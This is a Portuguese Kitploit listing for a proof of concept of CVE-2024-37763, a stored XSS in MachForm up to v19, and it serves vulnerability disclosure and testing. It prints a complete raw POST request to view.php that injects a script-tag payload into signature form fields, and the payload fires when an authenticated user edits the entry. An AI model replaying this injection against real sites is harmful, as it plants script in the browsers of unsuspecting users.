Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-37763 — Prova de conceito de exploit para CVE-2024-37763, um XSS armazenado não autenticado no MachForm até a v19, demonstrando injeção de payload por meio de parâmetros vulneráveis no view.php. | Kitploit
Ferramentas/GitHubGitHub/atreb92/cve-2024-37763
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubatreb92/cve-2024-37763

cve-2024-37763

Prova de conceito de exploit para CVE-2024-37763, um XSS armazenado não autenticado no MachForm até a v19, demonstrando injeção de payload por meio de parâmetros vulneráveis no view.php.

Ver Repositório
11há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição

O MachForm até a versão 19 é afetado por uma vulnerabilidade de cross-site scripting armazenada não autenticada que afeta usuários com sessões válidas que podem visualizar os resultados dos formulários compilados.

No aplicativo web alvo, ao usar um formulário com assinatura de texto habilitada, a requisição feita ao recurso vulnerável foi encontrada como sofrendo de ataque XSS. Um parâmetro do corpo da requisição POST dentro da URL vulnerável carece de sanitização, o que permite que um payload malicioso seja colocado e dispare código JavaScript no navegador da vítima.

Risco

  • Gravidade: Média
  • Pontuação CVSS v3.1: 5.4
  • Vetor CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Recursos Afetados

  • Versão: até MachForm v19
  • https:///view.php

Os parâmetros vulneráveis são dinâmicos, dependendo de onde o componente de assinatura de texto é colocado no formulário:

  • element_{numero_do_elemento}_text_signature
  • element_{numero_do_elemento}

Evidência

É possível injetar um payload JavaScript nos parâmetros vulneráveis.

image_1

Requisição:

root@kitploit:~
POST /view.php HTTP/1.1
Host: application-baseurl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://application-baseurl/
Content-Type: multipart/form-data; boundary=---------------------------6026266881719614557329755478
Content-Length: 1141
Origin: https://application-baseurl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_1"

test5
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_4_text_signature"

"><script>alert(1)</script>
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_4"

"><script>alert(1)</script>
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_12"; filename=""
Content-Type: application/octet-stream

-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_12_token"

3cc3be6c0c28b67f1c55eb23786b2869
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="form_id"

59032
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="submit_form"

1
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="page_number"

1
-----------------------------6026266881719614557329755478--

O payload então é disparado quando um usuário autenticado edita a entrada do resultado do formulário.

image_2

image_3

Baixar ferramenta